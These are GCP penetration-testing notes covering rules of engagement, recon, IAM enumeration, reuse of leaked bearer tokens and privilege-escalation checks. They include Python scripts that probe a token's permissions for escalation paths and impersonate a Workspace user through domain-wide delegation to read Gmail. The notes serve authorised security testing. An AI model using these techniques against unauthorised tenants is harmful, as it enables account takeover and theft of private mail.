GCP Pentesting Notes
These notes have been inspired by the amazing GCP Track at Hackfest 2025 created by Lutzenfried!
⚠️ Rules Of Engagement
GCP Security Testing Policy: GCP Acceptable Use Policy
- GCP allows security assessments on resources you control in your own GCP projects/account. Testing of Google’s underlying infrastructure, shared GCP control plane, or other users’ assets is prohibited.
- Testing must respect GCP’s Acceptable Use Policy; you are responsible for what you deploy/configure, and Google is responsible for the underlying cloud.
- There’s no pre-approval required for most in-scope resources, but any action that risks disruption or cross-tenant impact remains forbidden.
Prohibited activities
- Denial-of-service in any form: DoS/DDoS, protocol/port/request flooding, simulated DoS, or attacks against GCP infrastructure or management plane.
- Testing GCP-managed core services or attempting to access other tenants or Google’s internal systems/databases.
Allowed targets (your resources)
- Typical in-scope: your GCE VMs, GKE clusters, Cloud Storage buckets, App Engine services, Cloud Functions you own, networking resources within your project, IAM configuration, APIs/endpoints within your controlled environment.
- Commonly accepted techniques, provided they stay low impact: web app testing (SQLi/XSS), exploit validation, vulnerability and port scanning, and cautious fuzzing of endpoints inside your own project boundary.
🔧 Technical Requirements
General Advice
- For a white-box assessment, ask for roles/viewer plus roles/iam.securityReviewer on every in-scope project (or at the organization level): together they let you read resources and IAM policies, which is exactly what recon and privilege-escalation checks need, without granting any write access.
- When the usual gcloud auth flows are unavailable (you only hold a raw OAuth2 access token, not a key file or an interactive login), drive the REST APIs directly from Python or curl with the token as a bearer token.
Google Cloud SDK Installation
Info: official install guide: https://cloud.google.com/sdk/docs/install
Linux (Debian/Ubuntu; add Google's apt repository and signing key first, as described in the official guide, otherwise the package is not found)
sudo apt-get update
sudo apt-get install google-cloud-cli
macOS
Download and extract the .tar.gz from Google, run install.sh, then initialize with gcloud init.
GCP Attack Matrix
Tool Name: GCP_ATTACK_Matrix
An open-source, community-driven knowledge base of tactics, techniques, and procedures (TTPs) for attacking and defending Google Cloud Platform (GCP) and Google Workspace environments.
🔍 Outsider - Recon
Multi-Cloud Enumeration
Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.
Tool Name: cloud_enum
pip3 install -r ./requirements.txt
# -k: keyword to mutate (company or product name); -t: number of threads
./cloud_enum.py -k targetname -t 10
👹 Initial Access - Recon
Public Secrets
The goal here is to hunt for leaked secrets and passwords that could grant initial access:
- Google Dorking
- Look for sensitive documents
- Code Repositories
Public Code Repo
Tool Name: trufflehog
# Scan a single repository, reporting only secrets trufflehog could verify against the provider
trufflehog git https://github.com/trufflesecurity/test_keys --results=verified
# Scan every repository of a GitHub organization
trufflehog github --org=trufflesecurity --results=verified
Authenticate with GCP
There are multiple principal types, and so multiple ways to log in with gcloud.
User account (opens a browser OAuth flow)
gcloud auth login
Service account (JSON key file)
gcloud auth activate-service-account --key-file=service-account.json
Set default project:
#List all projects you have access
gcloud projects list
#Set Default Project
gcloud config set project PROJECT_ID
Get Access Token
Once authenticated, gcloud can mint tokens for the current credential.
#OAuth2
gcloud auth print-access-token
# Print ID token (OIDC JWT, used by Cloud Run & API Gateway)
gcloud auth print-identity-token
Permission Limitation
Check what the credential can do before running heavy tooling. If it only carries a handful of permissions (for example resourcemanager.projects.get and run.services.list), you can read basic project metadata and list Cloud Run services, and most other enumeration calls below will fail with 403 PERMISSION_DENIED.
Enumeration
Below is a set of useful commands to enumerate as much as possible inside the GCP tenant you just got initial access to. Run them against every project returned by gcloud projects list; IAM is inherited from the organization and folders, so read the policy at every level.
Organization & Project Structure
# List all organizations
gcloud organizations list
# List all folders
gcloud resource-manager folders list --organization=ORG_ID
# List all projects you can see
gcloud projects list
# Project details, parent info
gcloud projects describe PROJECT_ID
IAM & Permissions
# List project IAM policy
gcloud projects get-iam-policy PROJECT_ID
# Org-level IAM policy
gcloud organizations get-iam-policy ORG_ID
# Folder IAM
gcloud resource-manager folders get-iam-policy FOLDER_ID
# List service accounts
gcloud iam service-accounts list --project=PROJECT_ID
# List custom roles defined in the project (drop --project to list Google's predefined roles instead)
gcloud iam roles list --project=PROJECT_ID
Cloud Storage
# List buckets
gsutil ls -p PROJECT_ID
# Recursively list bucket contents
gsutil ls -r gs://BUCKET_NAME
# Bucket IAM policy
gsutil iam get gs://BUCKET_NAME
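The IAM policy commands above dump raw JSON; what matters on an engagement is a handful of binding patterns (public principals, basic roles, anyone who can act as or mint tokens for service accounts, anyone who can rewrite the policy). The following is an added example, not the page's own code, that triages the output of `gcloud projects get-iam-policy PROJECT_ID --format=json` (a `gsutil iam get gs://BUCKET` policy has the same bindings shape). The role lists are my assumptions about what is worth flagging, and the sample policy is constructed, not taken from a real tenant.

```python
"""Triage a GCP IAM policy JSON for the bindings a pentester cares about.
Added example, not code from the original notes; SAMPLE_POLICY is constructed."""
import json
import sys

PUBLIC_PRINCIPALS = {"allUsers", "allAuthenticatedUsers"}
BASIC_ROLES = {"roles/owner", "roles/editor"}
IAM_ADMIN_ROLES = {"roles/resourcemanager.projectIamAdmin", "roles/iam.securityAdmin"}
SA_ABUSE_ROLES = {
    "roles/iam.serviceAccountTokenCreator",  # mint tokens for the SA
    "roles/iam.serviceAccountKeyAdmin",      # create long-lived keys for the SA
    "roles/iam.serviceAccountUser",          # actAs: run workloads as the SA
}
SEVERITY_ORDER = {"high": 0, "medium": 1, "low": 2}


def triage_policy(policy_json: str) -> list:
    """Return findings (severity, role, member, reason, conditional), highest first."""
    policy = json.loads(policy_json)
    findings = []
    for binding in policy.get("bindings", []):
        role = binding["role"]
        # A condition narrows the grant; verify the expression, do not dismiss the binding.
        conditional = "condition" in binding
        for member in binding.get("members", []):
            if member in PUBLIC_PRINCIPALS:
                sev, why = "high", "public principal"
            elif role in BASIC_ROLES and member.endswith("@developer.gserviceaccount.com"):
                sev, why = "high", "default Compute Engine SA holds a basic role; every VM using it inherits it"
            elif role in BASIC_ROLES:
                sev, why = "high", "basic role"
            elif role in IAM_ADMIN_ROLES:
                sev, why = "high", "can rewrite the IAM policy"
            elif role in SA_ABUSE_ROLES:
                sev, why = "medium", "can impersonate or run as service accounts"
            elif member.startswith("deleted:"):
                sev, why = "low", "stale binding for a deleted principal"
            else:
                continue
            findings.append({"severity": sev, "role": role, "member": member,
                             "reason": why, "conditional": conditional})
    findings.sort(key=lambda f: (SEVERITY_ORDER[f["severity"]], f["role"], f["member"]))
    return findings


# Constructed sample policy (not a real tenant), shaped like get-iam-policy --format=json output.
SAMPLE_POLICY = json.dumps({
    "version": 3,
    "bindings": [
        {"role": "roles/owner", "members": ["user:alice@example.com"]},
        {"role": "roles/storage.objectViewer", "members": ["allUsers"]},
        {"role": "roles/iam.serviceAccountTokenCreator",
         "members": ["serviceAccount:ci@proj.iam.gserviceaccount.com"]},
        {"role": "roles/editor",
         "members": ["serviceAccount:123456-compute@developer.gserviceaccount.com"],
         "condition": {"title": "expired",
                       "expression": "request.time < timestamp('2020-01-01T00:00:00Z')"}},
        {"role": "roles/viewer", "members": ["group:readers@example.com"]},
    ],
})

if __name__ == "__main__":
    # usage: gcloud projects get-iam-policy PROJECT_ID --format=json > policy.json; python3 triage.py policy.json
    raw = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_POLICY
    for f in triage_policy(raw):
        flag = " (conditional)" if f["conditional"] else ""
        print(f'[{f["severity"]:6}] {f["role"]:45} {f["member"]}{flag}: {f["reason"]}')
```

Run it once per project and once per bucket of interest; a binding inherited from a folder or the organization does not appear in the project policy, so triage those levels separately.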
Compute
# List VMs
gcloud compute instances list --project=PROJECT_ID
# List disks
gcloud compute disks list --project=PROJECT_ID
# List images
gcloud compute images list --project=PROJECT_ID
Networking & Security
# List VPC networks
gcloud compute networks list --project=PROJECT_ID
# List subnets
gcloud compute networks subnets list --project=PROJECT_ID
# List firewalls
gcloud compute firewall-rules list --project=PROJECT_ID
# List SSL certs
gcloud compute ssl-certificates list --project=PROJECT_ID
Serverless / Managed
# List Cloud Run services
gcloud run services list --project=PROJECT_ID --region=REGION
# Describe Cloud Run
gcloud run services describe SERVICE_NAME --project=PROJECT_ID --region=REGION
# List Cloud Functions (list takes --regions, describe takes --region)
gcloud functions list --project=PROJECT_ID --regions=REGION
# Describe functions
gcloud functions describe FUNCTION_NAME --project=PROJECT_ID --region=REGION
Databases
# List Cloud SQL
gcloud sql instances list --project=PROJECT_ID
# List Firestore
gcloud firestore databases list --project=PROJECT_ID
# List BigQuery datasets (gcloud has no bigquery command group; use the bq CLI shipped with the SDK)
bq ls --project_id=PROJECT_ID
Org/Project Policies
# Project org policies
gcloud resource-manager org-policies list --project=PROJECT_ID
# Org org policies
gcloud resource-manager org-policies list --organization=ORG_ID
APIs
# List enabled APIs
gcloud services list --project=PROJECT_ID
Privilege Escalation & Enumeration Toolkits
Tool Name: RhinoSecurityLabs/GCP-IAM-Privilege-Escalation
# Requires credentials that can read IAM policies (getIamPolicy on the org, folders and projects)
python3 enumerate_member_permissions.py -p PROJECT_ID
# Check the collected permissions for known escalation paths
python3 check_for_privesc.py
Tool Name: NetSPI/gcpwn
- Add auth (ADC, service account key, or raw access token)
- Use modules: enum, privesc, exploit etc.
🧙 Post Exploitation
Limited Permissions
If the token or service account has very limited permissions (say it can only list Cloud Run services and read basic project info), most enumeration and privilege-escalation modules in the toolkits above will fail with 403 until those permissions are expanded. Enumerate what the token can actually do first instead of running every module blindly.
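The cheapest way to answer "what can this token do" is projects.testIamPermissions: you hand it a list of permission names and it returns the subset the caller holds, and it needs no IAM-read permission of its own, so it works for exactly the low-privilege tokens described above and in the Permission Limitation note. The following is an added example, not code from the page or from the Rhino/gcpwn toolkits. The permission list and the escalation hints are my assumptions for the example (every name must be a real IAM permission or the API answers 400); the HTTP transport is pluggable so the logic is testable offline.

```python
"""Probe which permissions a bearer token holds on a project and map them to
known escalation paths. Added example, not the page's or any tool's code."""
import json
import sys
import urllib.request

TEST_IAM_URL = "https://cloudresourcemanager.googleapis.com/v1/projects/{project}:testIamPermissions"
BATCH = 100  # API limit: at most 100 permissions per testIamPermissions call

# Assumed list for the example: permissions that matter for recon and privesc.
INTERESTING = [
    "resourcemanager.projects.get",
    "resourcemanager.projects.getIamPolicy",
    "resourcemanager.projects.setIamPolicy",
    "iam.serviceAccounts.list",
    "iam.serviceAccounts.actAs",
    "iam.serviceAccounts.getAccessToken",
    "iam.serviceAccountKeys.create",
    "compute.instances.list",
    "compute.instances.create",
    "compute.instances.setMetadata",
    "storage.buckets.list",
    "run.services.list",
    "cloudfunctions.functions.create",
]

# Each hint fires only when every permission in its set is granted.
PRIVESC_HINTS = [
    ({"resourcemanager.projects.setIamPolicy"}, "grant yourself roles/owner on the project"),
    ({"iam.serviceAccountKeys.create"}, "create a key for any SA in the project and authenticate as it"),
    ({"iam.serviceAccounts.getAccessToken"}, "mint short-lived access tokens for SAs (generateAccessToken)"),
    ({"iam.serviceAccounts.actAs", "compute.instances.create"},
     "launch a VM running as a privileged SA and read its metadata-server token"),
    ({"iam.serviceAccounts.actAs", "cloudfunctions.functions.create"},
     "deploy a Cloud Function that runs as a privileged SA"),
]


def http_post_json(url, headers, body):
    """Real transport: POST JSON, return the parsed JSON reply (401 = bad token)."""
    req = urllib.request.Request(url, data=json.dumps(body).encode(),
                                 headers={**headers, "Content-Type": "application/json"},
                                 method="POST")
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)


def probe_permissions(project, token, permissions=INTERESTING, post=http_post_json):
    """Return {"granted": [...], "denied": [...]} for the given project-level permissions."""
    headers = {"Authorization": f"Bearer {token}"}
    granted = set()
    perms = list(permissions)
    for i in range(0, len(perms), BATCH):
        chunk = perms[i:i + BATCH]
        reply = post(TEST_IAM_URL.format(project=project), headers, {"permissions": chunk})
        granted.update(reply.get("permissions", []))  # absent key means nothing granted
    return {"granted": sorted(granted), "denied": sorted(set(perms) - granted)}


def escalation_hints(granted):
    g = set(granted)
    return [hint for needs, hint in PRIVESC_HINTS if needs <= g]


if __name__ == "__main__":
    # usage: python3 probe.py PROJECT_ID "$(gcloud auth print-access-token)"
    project, token = sys.argv[1], sys.argv[2]
    result = probe_permissions(project, token)
    print("granted:", *result["granted"], sep="\n  ")
    for hint in escalation_hints(result["granted"]):
        print("privesc:", hint)
```

This only checks project-level grants; a token may still hold resource-level bindings (a single bucket, a single service account) that do not show up here, so pair it with the per-resource get-iam-policy commands.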
How to Use Bearer Tokens in API Calls
If you acquire an OAuth2 access token (ya29...) and want to use it for direct API calls:
curl -H "Authorization: Bearer <your_access_token>" https://cloudresourcemanager.googleapis.com/v1/projects/PROJECT_ID
JWT ID tokens (eyJhbGciOi...) are for services that authenticate callers with an ID token rather than an access token, e.g. a Cloud Run service locked down with IAM. The token's aud claim must match what the service expects: Cloud Run accepts the output of gcloud auth print-identity-token for user accounts, while for a service account you pass --audiences=SERVICE_URL so the aud claim matches the service.
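Before spending a found token it is worth knowing which kind it is and, for an ID token, who it belongs to and which audience it was minted for, since a Cloud Run service rejects a JWT whose aud does not match. The following is an added example, not code from the original notes: it tells an opaque ya29 access token from a JWT, reads the JWT claims without verifying the signature (we are the client, not the verifier), checks audience and expiry, and can ask Google's tokeninfo endpoint what a live token is. The sample token is constructed with a fake signature.

```python
"""Token triage: classify, decode (unverified) and audience-check GCP tokens.
Added example, not code from the original notes; SAMPLE_ID_TOKEN is constructed."""
import base64
import json
import sys
import time
import urllib.parse
import urllib.request

TOKENINFO_URL = "https://oauth2.googleapis.com/tokeninfo"


def _b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def classify_token(token: str) -> str:
    if token.startswith("ya29."):
        return "oauth2_access_token"       # opaque; only tokeninfo can tell you its scopes
    if token.startswith("eyJ") and token.count(".") == 2:
        return "jwt"                       # header.payload.signature, base64url
    return "unknown"


def decode_jwt_claims(token: str) -> dict:
    """Payload only. The signature is NOT checked; never use this to accept a token."""
    _header, payload, _sig = token.split(".")
    return json.loads(_b64url_decode(payload))


def summarize_token(token: str, expected_audience: str = None, now: float = None) -> dict:
    """Kind of token plus, for a JWT, the claims that decide where it can be used."""
    now = time.time() if now is None else now
    out = {"kind": classify_token(token)}
    if out["kind"] != "jwt":
        return out
    claims = decode_jwt_claims(token)
    out["claims"] = {k: claims.get(k) for k in ("iss", "aud", "sub", "email", "email_verified", "exp", "azp")}
    out["expired"] = claims.get("exp", 0) <= now
    aud = claims.get("aud")
    auds = aud if isinstance(aud, list) else [aud]
    out["audience_ok"] = (expected_audience in auds) if expected_audience else None
    return out


def tokeninfo(token: str) -> dict:
    """Network call to Google's tokeninfo endpoint: scopes, expiry and principal of a live token."""
    param = "id_token" if classify_token(token) == "jwt" else "access_token"
    url = TOKENINFO_URL + "?" + urllib.parse.urlencode({param: token})
    with urllib.request.urlopen(url, timeout=30) as resp:
        return json.load(resp)


def make_sample_jwt(claims: dict) -> str:
    """Build an unsigned-in-practice JWT for the offline example (signature bytes are fake)."""
    header = {"alg": "RS256", "typ": "JWT", "kid": "sample"}
    return ".".join([_b64url_encode(json.dumps(header).encode()),
                     _b64url_encode(json.dumps(claims).encode()),
                     _b64url_encode(b"not-a-real-signature")])


# Constructed sample: an ID token minted for a (hypothetical) Cloud Run service URL.
SAMPLE_ID_TOKEN = make_sample_jwt({
    "iss": "https://accounts.google.com",
    "aud": "https://svc-abc-uc.a.run.app",
    "sub": "1234567890",
    "email": "deploy@proj.iam.gserviceaccount.com",
    "email_verified": True,
    "iat": 1_700_000_000,
    "exp": 1_700_003_600,
})

if __name__ == "__main__":
    # usage: python3 tokens.py TOKEN [EXPECTED_AUDIENCE]
    tok = sys.argv[1] if len(sys.argv) > 1 else SAMPLE_ID_TOKEN
    aud = sys.argv[2] if len(sys.argv) > 2 else None
    print(json.dumps(summarize_token(tok, aud), indent=2))
```

For a ya29 token the summary is deliberately empty: the token is opaque, so call tokeninfo (or probe permissions against a project) to learn what it can do.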
Using Access Tokens with Python
Example using requests (raw REST call with the bearer token; "-" as the location lists services in every region)
import requests
headers = {"Authorization": "Bearer <access_token>"}
resp = requests.get("https://run.googleapis.com/v1/projects/<PROJECT_ID>/locations/-/services", headers=headers)
resp.raise_for_status()  # 401 = bad or expired token, 403 = token lacks run.services.list
print(resp.json())
Example using google-auth with only a raw access token (no refresh token, so it stops working when the token expires, typically after one hour)
from google.oauth2.credentials import Credentials
from googleapiclient.discovery import build
# google.oauth2.credentials.Credentials accepts a bare OAuth2 access token;
# google.auth.credentials.Credentials is the abstract base class and cannot be instantiated.
creds = Credentials(token="<access_token>")
service = build("run", "v1", credentials=creds)
response = service.projects().locations().services().list(
    parent="projects/<PROJECT_ID>/locations/-"  # "-" = all regions
).execute()
print(response)
GCP Domain Wide Delegation
Tool Name: Lutzenfried/Delegate
A GitHub tool to abuse GCP domain-wide delegation: given a service account key whose client ID a Workspace admin has authorized for the relevant scopes, it impersonates users and reads their Gmail and Drive data.
python delegate.py -k <SERVICE_ACCOUNT_KEY> -i <EMAIL_TO_IMPERSONATE> -m <MODULE> -a <ACTION> [OPTIONS]
Check the README.md for more detailed commands.
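The mechanism the tool relies on is worth seeing once in the open, because it is nothing more than the standard OAuth2 JWT-bearer grant with one extra claim: the service account signs a JWT whose sub names the Workspace user to impersonate, and Google's token endpoint returns an access token for that user if, and only if, a Workspace admin has authorized the service account's client ID for the requested scopes (otherwise it answers unauthorized_client). The following is an added example, not Lutzenfried/Delegate's code. Signing is pluggable so the claim set can be checked offline; the real RS256 signer needs the cryptography package and a genuine service-account key JSON.

```python
"""Domain-wide delegation by hand: the OAuth2 JWT-bearer grant with a `sub` claim.
Added example, not code from the Delegate tool or the original notes."""
import base64
import json
import sys
import time
import urllib.parse
import urllib.request

TOKEN_URL = "https://oauth2.googleapis.com/token"
JWT_BEARER = "urn:ietf:params:oauth:grant-type:jwt-bearer"


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def decode_segment(segment: str) -> dict:
    """Decode one base64url JWT segment back to JSON (for inspection/tests)."""
    return json.loads(base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4)))


def build_claims(sa_email: str, subject: str, scopes: list, now: float = None, lifetime: int = 3600) -> dict:
    """Claim set for a delegated token; `sub` is what turns it into impersonation."""
    iat = int(time.time() if now is None else now)
    return {"iss": sa_email,                 # the service account doing the signing
            "sub": subject,                  # the Workspace user to impersonate
            "scope": " ".join(scopes),       # space-separated OAuth scopes
            "aud": TOKEN_URL,
            "iat": iat,
            "exp": iat + lifetime}           # Google caps assertion lifetime at one hour


def build_assertion(claims: dict, sign, kid: str = None) -> str:
    """Compact JWS: base64url(header).base64url(claims).base64url(signature)."""
    header = {"alg": "RS256", "typ": "JWT"}
    if kid:
        header["kid"] = kid                   # private_key_id from the key JSON
    compact = lambda obj: json.dumps(obj, separators=(",", ":")).encode()
    signing_input = b64url(compact(header)) + "." + b64url(compact(claims))
    return signing_input + "." + b64url(sign(signing_input.encode()))


def rs256_signer(private_key_pem: str):
    """Real signer: RSASSA-PKCS1-v1_5 over SHA-256 with the SA private key (needs `cryptography`)."""
    from cryptography.hazmat.primitives import hashes, serialization
    from cryptography.hazmat.primitives.asymmetric import padding
    key = serialization.load_pem_private_key(private_key_pem.encode(), password=None)
    return lambda data: key.sign(data, padding.PKCS1v15(), hashes.SHA256())


def exchange_assertion(assertion: str) -> dict:
    """POST the assertion to the token endpoint; returns {"access_token", "expires_in", ...}."""
    body = urllib.parse.urlencode({"grant_type": JWT_BEARER, "assertion": assertion}).encode()
    req = urllib.request.Request(TOKEN_URL, data=body, method="POST",
                                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)


def delegated_access_token(key_json: dict, subject: str, scopes: list) -> str:
    claims = build_claims(key_json["client_email"], subject, scopes)
    assertion = build_assertion(claims, rs256_signer(key_json["private_key"]), key_json.get("private_key_id"))
    return exchange_assertion(assertion)["access_token"]


if __name__ == "__main__":
    # usage: python3 dwd.py service-account.json victim@example.com
    key = json.load(open(sys.argv[1]))
    print(delegated_access_token(key, sys.argv[2], ["https://www.googleapis.com/auth/gmail.readonly"]))
```

The resulting access token is an ordinary bearer token for the impersonated user, usable against the Gmail or Drive REST APIs exactly like the ya29 tokens above; which users and scopes it can cover is decided entirely by the admin's delegation grant, which is why that grant is the finding to report.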
⭐ More Resources
This section is dedicated to other wikis and notes available that are solely about Google Cloud.
If you have notes or a website related to this topic, feel free to contact me; I would be happy to share the links here :)
